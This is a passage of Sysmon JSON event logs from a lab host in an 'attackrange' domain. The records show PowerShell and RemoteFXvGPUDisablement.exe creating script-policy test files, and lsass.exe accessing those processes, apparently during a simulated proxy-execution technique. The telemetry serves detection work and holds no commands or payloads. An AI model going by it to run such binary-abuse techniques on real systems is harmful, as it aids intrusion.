C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"2604","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":987,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.581\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010E2370100}\r\nProcessId: 2080\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_i3ho45p4.z03.ps1\r\nCreationUtcTime: 2020-08-01 07:53:09.581","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.581","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010E2370100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_i3ho45p4.z03.ps1","CreationUtcTime":"2020-08-01 07:53:09.581","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":988,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.581\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nProcessId: 2112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_oger10kw.s2w.ps1\r\nCreationUtcTime: 2020-08-01 07:53:09.581","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.581","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010923B0100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_oger10kw.s2w.ps1","CreationUtcTime":"2020-08-01 07:53:09.581","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":989,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.659\r\nProcessGuid: {41C8662E-1F63-5F25-0000-001053410100}\r\nProcessId: 2144\r\nImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_wbzpsjxy.anl.ps1\r\nCreationUtcTime: 2020-08-01 07:53:09.659","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.659","ProcessGuid":"{41C8662E-1F63-5F25-0000-001053410100}","Image":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_wbzpsjxy.anl.ps1","CreationUtcTime":"2020-08-01 07:53:09.659","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":990,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nTargetProcessId: 2112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","TargetProcessId":"2112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":991,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010E2370100}\r\nTargetProcessId: 2080\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010E2370100}","TargetProcessId":"2080","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":992,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nTargetProcessId: 2112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","TargetProcessId":"2112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":993,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010E2370100}\r\nTargetProcessId: 2080\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010E2370100}","TargetProcessId":"2080","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":994,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.565\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001053410100}\r\nTargetProcessId: 2144\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.565","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001053410100}","TargetProcessId":"2144","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":995,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.565\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001053410100}\r\nTargetProcessId: 2144\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.565","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001053410100}","TargetProcessId":"2144","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
